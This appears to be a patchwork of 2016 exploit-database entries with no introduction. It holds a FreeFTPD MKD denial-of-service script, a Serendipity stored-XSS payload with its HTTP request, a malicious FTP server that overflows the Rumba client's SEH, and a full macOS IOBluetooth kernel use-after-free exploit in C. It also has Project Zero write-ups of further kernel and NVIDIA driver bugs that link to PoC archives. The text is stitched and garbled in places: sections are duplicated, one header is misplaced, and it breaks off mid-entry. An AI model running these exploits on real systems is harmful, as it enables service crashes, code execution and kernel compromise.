dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
RUMBA Command-line File Transfer Utility
from ftplib import FTP
print '''
`,;'++';,`
`'++++++++++++++++;`
.+++++++++++++++++++++++'`
;++++++:` `:++++++:
'++++'` , +`. :; .`` .'++++;
:++++, '+ `+.+.+`+':+:+ +:` + :++++,
++++, `+ +`+.+`+':+.+ +:'.+. :++++
,+++; +` +:':+`+',+`+,++.+:+ +, '+++.
'+++` `++ ;+ ,+:'; ,: ;;+`++ +.+`+. `+++;
+++; `: ++' + '+++ :++;++,+: + '+++
+++, ++' ,+ .;+++++',` : + ',+ :+++
+++` ++ +:+ +: .+++++++++++++++; : ++'+,,`,+++
+++` `+;.+'` '++++++++++++++++++++. ;+;+:.+` .+++
'++` ++ +,.` '++++++++++++++++++++++++. +;.+`+ ,++;
:++, +:++`' ,+++++++++++++''++++++++++++ `+.+: :++.
++; . +:+: +++++++++'. `;++++++++. .+' ++ +++
+++ ;++ +: ++++++++, .+++++++; ;:+;+ +++
:++ ;+,++ `+++++++, `++++++' +,+,.+ `++.
++: `+`+'. ++++++' ;+++++' +`;++ '++
'++ ,+,' ++++++, .+++++; ++ ++:
++. ' + ++++++` +++++. ` '+.:++
;++ +; + ;+++++` +++++ :++ ; ++:
++, '++ `+++++, `+++++ +` `. :++
,++ ` ;+: +++++' :++++` ,+ ++`
++; .+++` .+++++ +++++ '++:: ++'
++` ;+':: +++++. ++++` '`+++`.++
.++ `++ +++++ '++++ +: ++`
'++ `++; '++++` ++++ ++;
++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++:
++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ +;,` ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++:
;++ `.,. +++++
+++ '..': ,++'` ,+++` `++++
+++ +;+` ++++: ++++++' ++++++' ++++
+++ :.'`; ++++: ++` :+, ++` ,+: ++++
'++ `+++. ++++; : + : + ,++++
;++ :` ++++' `+++++
,++ `+;;+ +++++ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; :;;;;;;;;;;;;;;++++++.
`++ ++,+ +++++ :+++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++'
++ ` `, ;++++ ++++++++++++++++++++++++++++++++++++: ++++++++++++++++++++
++` .+++.`++++: ++++++++++++++++++++++++++++++++++++ `++++++++++++++++++,
++: ','+: +++++ :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++ ++++:,:,,:,,+++,.
;++ +:`, '++++` +++++. +++++` ++++ '.+' ++,
++ +++ +++++ :+++++ ++++++ ;++++ ++.+ ++
++, ';`+' +++++` ++++++ ++++++ ++++` + +. :++
'++ :++;, .+++++ ++++++` ++++++, +++++ ++:
`++ +` :+, +++++: .++++++' :++++++; .++++. +` `++
++' ;++` `+++++` ,+++++++'` :+++++++; +++++ :++` +++
,++ ,: + '+++++ .++++++++++';:;++++++++++: +++++ ;+' ++`
+++ :+' ++++++ ++++++++++++++++++++++` +++++. ;+` , +++
,++ :++`;+` ++++++` :++++++++++++++++++' +++++' `+,+;`;`++.
+++ : ++.+ `++++++: :++++++++++++++; ,+++++' ++`+ +++
`++, +;+` `+++++++` `:++++++++:` ++++++' ++ ,+; ;++`
'++ :+ `' ++++++++` `+++++++; +++ ;`++;
+++ `:`+ +++++++++: ,++++++++, +,++ +++
+++ +++;' :+++++++++++';::;'+++++++++++ ;+ +,' +++
,+++ +++.+.: +++++++++++++++++++++++++. '' ++ + +++`
;++' ` +`+`;. `+++++++++++++++++++++, :,+,:+: +++,
;+++ ,++:'++` ,+++++++++++++++; ++ .++ ` +++:
;+++ + +`+ +; .;'++++':` ++.+':++ +++:
:+++` `++, :;+`+; ::+ +,+`+. .+++,
.+++' `, +`:'+ +,+` +, +:+.++:';+ ++ ++++`
++++. +':++: +;+` ': +:+ +.+ +' :++++
:++++. . +,+,;+'` '; :'+`+'+ ,++++,
+++++: ` +`+'` '; `++` ;++++'
`++++++: ;' + :++++++`
`+++++++':. `,:+++++++'
.++++++++++++++++++++++.
`:'++++++++++++',
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit
# Date: 2016.10.30
# Exploit Author: Greg Priest
# Version: FreeFTPD_1.0.8
# Tested on: Windows XP, Windows 7 x64
'''
ftp_ip = raw_input("FTP server IP:")
killerstring = 'A' * 500
ftp = FTP('127.0.0.1')
ftp.login('anonymous', 'h4ck3r@h4ck3r.net')
print ftp.login
print "SERVER KILLED"
FTP.mkd(ftp, killerstring)
========================================
Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting
Application: Serendipity
Class: Sensitive Information disclosure
Versions Affected: <= latest version
Vendor URL: http://docs.s9y.org/
Software URL: http://docs.s9y.org/downloads.html
Bugs: Persistent Cross Site Scripting
Date of found: 29.10.2016
Author: Besim
========================================
2.CREDIT
========================================
Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK
3. VERSIONS AFFECTED
========================================
<= latest version
4. TECHNICAL DETAILS & POC
========================================
Stored Cross Site Scripting (No Admin Required)
========================================
1) Editor login panel
2) User click 'New Entry'
3) Attacker(normal user) enter xss payload to 'Entry Body' input
4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script>
### HTTP Request ###
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Cookie: ---
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762
- POST DATA
serendipity[action]=admin
&serendipity[adminModule]=entries
&serendipity[adminAction]=save
&serendipity[id]=
&serendipity[timestamp]=1477314176
&serendipity[preview]=false
&serendipity[token]=324fa32a404e03de978d9a18f86a3338
&serendipity[title]=New Page
&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>
&serendipity[extended]=
&serendipity[chk_timestamp]=1477314176
&serendipity[new_timestamp]=2016-10-24 15:02
&serendipity[isdraft]=false
&serendipity[allow_comments]=true
&serendipity[had_categories]=1
&serendipity[propertyform]=true
&serendipity[properties][access]=public
&ignore_password=
&serendipity[properties][entrypassword]=
&serendipity[change_author]=4
# Exploit Title: Rumba FTP 4.x Client Stackoverflow SEH
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307
# Version: 4.x
# Tested on: Windows 7
# CVE : CVE-2016-5764
1. Description
Micro Focus Rumba FTP Client 4.x cannt handle long directory names. An attacker can setup a malicious FTP server that can send a long directory name which can led to remote code execution
on connected client.
2. Proof of Concept
The code below can be used to setup a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH.
3. PoC Code
------------------- Server.py --------------------------
import socket
import sys
import time
# IP Address
IP = '127.0.0.1' \
''
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = (IP,21)
print "Starting up on %s port %s" % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
# Wait for incoming connection
while True:
print "Waiting for a connection"
connection, client_address = sock.accept()
try:
print "Connection from " + str(client_address)
# Receive the data in small chunks and restransmit it
connection.send("220 Welcome\r\n")
while(True):
data = connection.recv(16)
print "received %s" % data
if "USER" in data:
print "Sending 331"
connection.send("331 Please specify the password.\r\n")
if "PASS" in data:
print "Sending 227"
connection.send("230 Login successful.\n\n")
if "PWD" in data:
print "Sending 257"
# 77A632E2 add esp,908 pop pop pop ret
# THIS IS THE PART WHERE THE OVERFLOW HAPPENS
connection.send("257 \"/"+"A"*629+"\x45\x45\x45\x45"+ "\x44\x44\x44\x44" + "D"*185 + "rrrr" + "D"*211 + "\"\r\n")
if "TYPE A" in data:
print "Sending 200 Switching to ASCII mode."
connection.send("200 Switching to ASCII mode.\r\n")
if "TYPE I" in data:
print "Sending 200 Switching to Binary mode."
connection.send("200 200 Switching to Binary mode.\r\n")
if "SYST" in data:
print "Sending 215"
connection.send("215 UNIX Type: L8\r\n")
if "SIZE" in data:
print "Sending 200"
connection.send("200 Switching to Binary mode. \r\n")
if "FEAT" in data:
print "Sending 211-Features"
connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n")
if "CWD" in data:
print "Sending 250 Directory successfully changed."
connection.send("250 Directory successfully changed.\r\n")
if "PASV" in str(data):
print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n"
connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n")
# Listen on new socket for connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
#Bind socket to local host and port
try:
s.bind((IP, 28599))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete for PASV on port 28599'
#Start listening on socket
s.listen(10)
print 'Socket now listening on 28599'
#now keep talking with the client
#wait to accept a connection - blocking call
conn, addr = s.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
time.sleep(1)
print "Sending dir list"
connection.send("150 Here comes the directory listing.\r\n")
conn.send("d"*500+"rwx------ 2 500 500 4096 Nov 05 2007 " + "A." + "B"*500 + "\r\n")
# Send ok to ftp client
connection.send("226 Directory send OK.\r\n")
# close the connection
s.close()
conn.close()
break
if "EXIT" in str(data):
print "REC"
connection.send("Have a nice day!\r\n")
break
finally:
connection.close()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=830
When you create a new IOKit user client from userspace you call:
kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect );
The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes
a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference.
is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented
by the service.
If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference.
We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference
we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client
to use the free'd task struct.
IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user
and stores a raw task struct pointer at this+0xe0 without taking a reference.
This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors.
This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient
passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes
an external method on the user client leading to the UaF.
The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that
this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting
logic stuff too.
Note that bluetooth does have to be turned on for this PoC to work!
build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit
You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
*/
// ianbeer
/*
OS X kernel use-after-free in IOBluetoothFamily.kext
When you create a new IOKit user client from userspace you call:
kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect );
The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes
a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference.
is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented
by the service.
If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference.
We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference
we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client
to use the free'd task struct.
IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user
and stores a raw task struct pointer at this+0xe0 without taking a reference.
This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors.
This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient
passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes
an external method on the user client leading to the UaF.
The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that
this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting
logic stuff too.
Note that bluetooth does have to be turned on for this PoC to work!
build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit
You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <libkern/OSAtomic.h>
#include <mach/mach.h>
#include <mach/mach_error.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach/task_special_ports.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>
#define MACH_ERR(str, err) do { \
if (err != KERN_SUCCESS) { \
mach_error("[-]" str "\n", err); \
exit(EXIT_FAILURE); \
} \
} while(0)
#define FAIL(str) do { \
printf("[-] " str "\n"); \
exit(EXIT_FAILURE); \
} while (0)
#define LOG(str) do { \
printf("[+] " str"\n"); \
} while (0)
/***************
* port dancer *
***************/
// set up a shared mach port pair from a child process back to its parent without using launchd
// based on the idea outlined by Robert Sesek here: https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html
// mach message for sending a port right
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t port;
} port_msg_send_t;
// mach message for receiving a port right
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t port;
mach_msg_trailer_t trailer;
} port_msg_rcv_t;
typedef struct {
mach_msg_header_t header;
} simple_msg_send_t;
typedef struct {
mach_msg_header_t header;
mach_msg_trailer_t trailer;
} simple_msg_rcv_t;
#define STOLEN_SPECIAL_PORT TASK_BOOTSTRAP_PORT
// a copy in the parent of the stolen special port such that it can be restored
mach_port_t saved_special_port = MACH_PORT_NULL;
// the shared port right in the parent
mach_port_t shared_port_parent = MACH_PORT_NULL;
void setup_shared_port() {
kern_return_t err;
// get a send right to the port we're going to overwrite so that we can both
// restore it for ourselves and send it to our child
err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &saved_special_port);
MACH_ERR("saving original special port value", err);
// allocate the shared port we want our child to have a send right to
err = mach_port_allocate(mach_task_self(),
MACH_PORT_RIGHT_RECEIVE,
&shared_port_parent);
MACH_ERR("allocating shared port", err);
// insert the send right
err = mach_port_insert_right(mach_task_self(),
shared_port_parent,
shared_port_parent,
MACH_MSG_TYPE_MAKE_SEND);
MACH_ERR("inserting MAKE_SEND into shared port", err);
// stash the port in the STOLEN_SPECIAL_PORT slot such that the send right survives the fork
err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, shared_port_parent);
MACH_ERR("setting special port", err);
}
mach_port_t recover_shared_port_child() {
kern_return_t err;
// grab the shared port which our parent stashed somewhere in the special ports
mach_port_t shared_port_child = MACH_PORT_NULL;
err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &shared_port_child);
MACH_ERR("child getting stashed port", err);
LOG("child got stashed port");
// say hello to our parent and send a reply port so it can send us back the special port to restore
// allocate a reply port
mach_port_t reply_port;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
MACH_ERR("child allocating reply port", err);
// send the reply port in a hello message
simple_msg_send_t msg = {0};
msg.header.msgh_size = sizeof(msg);
msg.header.msgh_local_port = reply_port;
msg.header.msgh_remote_port = shared_port_child;
msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
err = mach_msg_send(&msg.header);
MACH_ERR("child sending task port message", err);
LOG("child sent hello message to parent over shared port");
// wait for a message on the reply port containing the stolen port to restore
port_msg_rcv_t stolen_port_msg = {0};
err = mach_msg(&stolen_port_msg.header, MACH_RCV_MSG, 0, sizeof(stolen_port_msg), reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
MACH_ERR("child receiving stolen port\n", err);
// extract the port right from the message
mach_port_t stolen_port_to_restore = stolen_port_msg.port.name;
if (stolen_port_to_restore == MACH_PORT_NULL) {
FAIL("child received invalid stolen port to restore");
}
// restore the special port for the child
err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, stolen_port_to_restore);
MACH_ERR("child restoring special port", err);
LOG("child restored stolen port");
return shared_port_child;
}
mach_port_t recover_shared_port_parent() {
kern_return_t err;
// restore the special port for ourselves
err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port);
MACH_ERR("parent restoring special port", err);
// wait for a message from the child on the shared port
simple_msg_rcv_t msg = {0};
err = mach_msg(&msg.header,
MACH_RCV_MSG,
0,
sizeof(msg),
shared_port_parent,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
MACH_ERR("parent receiving child hello message", err);
LOG("parent received hello message from child");
// send the special port to our child over the hello message's reply port
port_msg_send_t special_port_msg = {0};
special_port_msg.header.msgh_size = sizeof(special_port_msg);
special_port_msg.header.msgh_local_port = MACH_PORT_NULL;
special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port;
special_port_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX;
special_port_msg.body.msgh_descriptor_count = 1;
special_port_msg.port.name = saved_special_port;
special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
special_port_msg.port.type = MACH_MSG_PORT_DESCRIPTOR;
err = mach_msg_send(&special_port_msg.header);
MACH_ERR("parent sending special port back to child", err);
return shared_port_parent;
}
/*** end of port dancer code ***/
void do_child(mach_port_t shared_port) {
kern_return_t err;
// create a reply port to receive an ack that we should exec the target
mach_port_t reply_port;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
MACH_ERR("child allocating reply port", err);
// send our task port to our parent over the shared port
port_msg_send_t msg = {0};
msg.header.msgh_size = sizeof(msg);
msg.header.msgh_local_port = reply_port;
msg.header.msgh_remote_port = shared_port;
msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) | MACH_MSGH_BITS_COMPLEX;
msg.body.msgh_descriptor_count = 1;
msg.port.name = mach_task_self();
msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
msg.port.type = MACH_MSG_PORT_DESCRIPTOR;
err = mach_msg_send(&msg.header);
MACH_ERR("child sending task port message", err);
LOG("child sent task port back to parent");
// spin and let our parent kill us
while(1){;}
}
mach_port_t do_parent(mach_port_t shared_port) {
kern_return_t err;
// wait for our child to send us its task port
port_msg_rcv_t msg = {0};
err = mach_msg(&msg.header,
MACH_RCV_MSG,
0,
sizeof(msg),
shared_port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
MACH_ERR("parent receiving child task port message", err);
mach_port_t child_task_port = msg.port.name;
if (child_task_port == MACH_PORT_NULL) {
FAIL("invalid child task port");
}
LOG("parent received child's task port");
return child_task_port;
}
io_connect_t get_connection(mach_port_t task_port) {
kern_return_t err;
mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
if (service == MACH_PORT_NULL) {
printf("unable to get service\n");
return MACH_PORT_NULL;
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, task_port, 0, &conn); // 1 = IOBluetoothHCIUserClient
if (err != KERN_SUCCESS){
printf("IOServiceOpen failed: %s\n", mach_error_string(err));
conn = MACH_PORT_NULL;
}
IOObjectRelease(service);
return conn;
}
void trigger(int child_pid, mach_port_t child_task_port) {
kern_return_t err;
// get the userclient passing the child's task port
io_connect_t conn = get_connection(child_task_port);
if (conn == MACH_PORT_NULL){
printf("unable to get connection\n");
return;
}
printf("got user client\n");
// drop our ref on the child_task_port
mach_port_deallocate(mach_task_self(), child_task_port);
// kill the child, free'ing its task struct
kill(child_pid, 9);
int status;
wait(&status);
printf("killed child\n");
// make an external method call which will use that free'd task struct
char struct_input[0x74] = {0};
//+0x70 dword = index into sroutines
//+0x38 dword = size of first argument
//+0x0 qword = pointer to first argument
struct_input[0x38] = 0x80;
*(uint64_t*)(&struct_input[0]) = 0x414141414141;
err = IOConnectCallMethod(conn,
0,
NULL,
0,
struct_input,
0x74,
NULL,
NULL,
NULL,
NULL);
MACH_ERR("making external method call", err);
}
int main(int argc, char** argv) {
setup_shared_port();
pid_t child_pid = fork();
if (child_pid == -1) {
FAIL("forking");
}
if (child_pid == 0) {
mach_port_t shared_port_child = recover_shared_port_child();
do_child(shared_port_child);
} else {
mach_port_t shared_port_parent = recover_shared_port_parent();
mach_port_t child_task_port = do_parent(shared_port_parent);
trigger(child_pid, child_task_port);
}
return 0;
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=831
IOSurfaceRootUserClient stores a task struct pointer (passed in via IOServiceOpen) in the field at +0xf0 without taking a reference.
By killing the corrisponding task we can free this pointer leaving the user client with a dangling pointer. We can get this pointer used
by calling the create_surface_fast_path external method which will try to read and use the memory map off of the free'd task struct.
This bug could be leveraged for kernel memory corruption and is reachable from interesting sandboxes including safari and chrome.
build: clang -o surfaceroot_uaf surfaceroot_uaf.c -framework IOKit
You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
#####################################
another PoC for "task_t considered harmful"
since 10.11.6 blocks us from creating userclients with other task's task ports
this time we create an IOSurface in the child and send back a send right to that
IOSurface to the parent (rather than sending the child's task port.)
The child then execs a suid-root binary which blocks on stderr and the parent
creates an IOSurface which maps any (writable?) page of the euid-0 process into theirs.
Overwrite a function pointer and win.
No race conditions because the task struct pointer is on the kernel heap, not the stack.
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40653.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=882
mach_ports_register is a kernel task port MIG method.
It's defined in MIG like this:
routine mach_ports_register(
target_task : task_t;
init_port_set : mach_port_array_t =
^array[] of mach_port_t);
Looking at the generated code for this we notice something kinda weird; here's the mach message structure
which actually gets sent:
typedef struct {
mach_msg_header_t Head;
// start of the kernel processed data
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t init_port_set;
// end of the kernel processed data
NDR_record_t NDR;
mach_msg_type_number_t init_port_setCnt;
} Request __attribute__((unused));
The message contains an OOL ports descriptor, which is expected, but also contains a separate init_port_setCnt value
even though the ool_ports_descriptor_t already has the correct length of the descriptor.
When the kernel process this ool ports descriptor in ipc_kmsg_copyin_ool_ports_descriptor it will kalloc a buffer large enough
for all the ports and then copyin and convert them all. It does this using the init_port_set.count value, not init_port_setCnt.
The generated MIG code however calls mach_ports_register like this:
OutP->RetCode = mach_ports_register(target_task, (mach_port_array_t)(In0P->init_port_set.address), In0P->init_port_setCnt);
without verifying that In0P->init_port_setCnt is equal to init_port_set.count.
This means that when we reach mach_ports_register lots of stuff goes wrong:
kern_return_t
mach_ports_register(
task_t task,
mach_port_array_t memory, <-- points to kalloc'ed buffer
mach_msg_type_number_t portsCnt) <-- completely controlled, not related to size of kalloc'ed buffer
{
ipc_port_t ports[TASK_PORT_REGISTER_MAX];
unsigned int i;
if ((task == TASK_NULL) ||
(portsCnt > TASK_PORT_REGISTER_MAX) ||
(portsCnt && memory == NULL))
return KERN_INVALID_ARGUMENT; <-- portsCnt must be >=1 && <= 3
for (i = 0; i < portsCnt; i++)
ports[i] = memory[i]; <-- if we only sent one OOL port but set portsCnt >1 this will read a mach_port_t (a pointer) out of bounds
for (; i < TASK_PORT_REGISTER_MAX; i++)
ports[i] = IP_NULL;
itk_lock(task);
if (task->itk_self == IP_NULL) {
itk_unlock(task);
return KERN_INVALID_ARGUMENT;
}
for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
ipc_port_t old;
old = task->itk_registered[i];
task->itk_registered[i] = ports[i];
ports[i] = old;
}
itk_unlock(task);
for (i = 0; i < TASK_PORT_REGISTER_MAX; i++)
if (IP_VALID(ports[i]))
ipc_port_release_send(ports[i]); <-- this can decrement the ref on a pointer which was read out of bounds if we call this function multiple times
if (portsCnt != 0)
kfree(memory,
(vm_size_t) (portsCnt * sizeof(mach_port_t))); <-- this can call kfree with the wrong size
return KERN_SUCCESS;
}
For this PoC I've patched the MIG generated code to always only send one OOL mach port but still set init_port_setCnt to a controlled value - you should see a kernel
panic decrementing an invalid reference or something like that.
This bug however could be exploited quite nicely to cause a mach_port_t UaF which could have all kinds of fun consequences (getting another task's task port for example!)
tested on OS X 10.11.6 (15G31) on MacBookPro10,1
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40654.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=880
The \\.\UVMLiteController device is created by the nvlddmkm.sys driver, and can be opened by any user. The driver handles various control codes for this device, but there is no validation for the input/output buffer and their sizes.
In addition to potential overreads on the input, the driver writes output directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl() by the user. The IO control codes handled specify METHOD_BUFFERED, but the kernel does no validation that the output pointer is accessible by the user process if the user passes an output buffer size of 0.
This means that a user mode program can cause a write of (at least) the 32-bit values 0 or 31, or the 8-bit value 0 to any address given to the driver.
A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414141414141+0x30.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40655.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=892
The handler for the DxgkDdiEscape escape code 0x70000D4 has the following pseudocode:
void __fastcall escape_70000D4(NvMiniportDeviceContext *a1, NvEscapeData *a2)
{
Escape70000D4 *escape_data_; // rbx@1
PVOID alloc_buf; // rsi@1
unsigned int v4; // edi@1
__int64 user_ptr; // r14@4
DWORD *v6; // rbx@5
__int128 v7; // [rsp+40h] [rbp-38h]@1
__int128 v8; // [rsp+50h] [rbp-28h]@4
PVOID alloc_buf_; // [rsp+60h] [rbp-18h]@4
escape_data_ = (Escape70000D4 *)a2;
a2->unknown_rest[6] = 1;
LODWORD(v7) = 0;
memset((char *)&v7 + 4, 0, 0x24ui64);
alloc_buf = ExAllocatePoolWithTag_(PagedPool, escape_data_->user_ptr_size, 'paVN');
v4 = 0;
if ( !alloc_buf )
v4 = 0xFFFF;
if ( v4 )
goto LABEL_12;
HIDWORD(v8) = escape_data_->user_ptr_size;
alloc_buf_ = alloc_buf;
v4 = sub_625BC(0i64, dword_B1BB94, escape_data_->unknown_0, 0x83F30101, (__int64)&v7, 40);
user_ptr = escape_data_->user_ptr;
ProbeForWrite((PVOID)escape_data_->user_ptr, escape_data_->user_ptr_size, UserMode);
memcpy((void *)escape_data_->user_ptr, alloc_buf, escape_data_->user_ptr_size);
*(_OWORD *)&escape_data_->unknown_2 = v7;
*(_OWORD *)&escape_data_->unknown_4 = v8;
escape_data_->user_ptr = user_ptr;
if ( v4 )
{
LABEL_12:
v6 = &escape_data_->header.unknown_rest[6];
if ( v6 )
{
if ( v4 <= 0xFFFFF000 )
*v6 = -4096 - v4;
}
}
if ( alloc_buf )
ExFreePoolWithTag_(alloc_buf, 0x7061564Eu);
}
ExAllocatePoolWithTag is called with a user provided size to allocate a buffer, but the subsequent copying of said buffer to the user provided pointer doesn't make sense since the buffer is never initialised with any values. This means that a user mode program can leak uninitialised memory from arbitrarily-sized pool allocations.
########
Looks like I made an oversimplified analysis of the pseudocode in the report. The allocated buffer pointer is indeed passed off to the sub_625BC function (as part of a struct member on the stack) which eventually passes it to a bunch of other functions.
However, this doesn't change the fact that with the provided PoC, the pool allocated buffer still isn't being initialised and is copied into the user buffer unchanged.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40656.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=911
The DxgkDdiEscape handler for 0x600000D passes an unchecked user provided
pointer as the destination for a memcpy call. This leads to kernel memory
corruption.
(Win 10 x64 372.54) crashing context with PoC:
SYSTEM_SERVICE_EXCEPTION (3b)
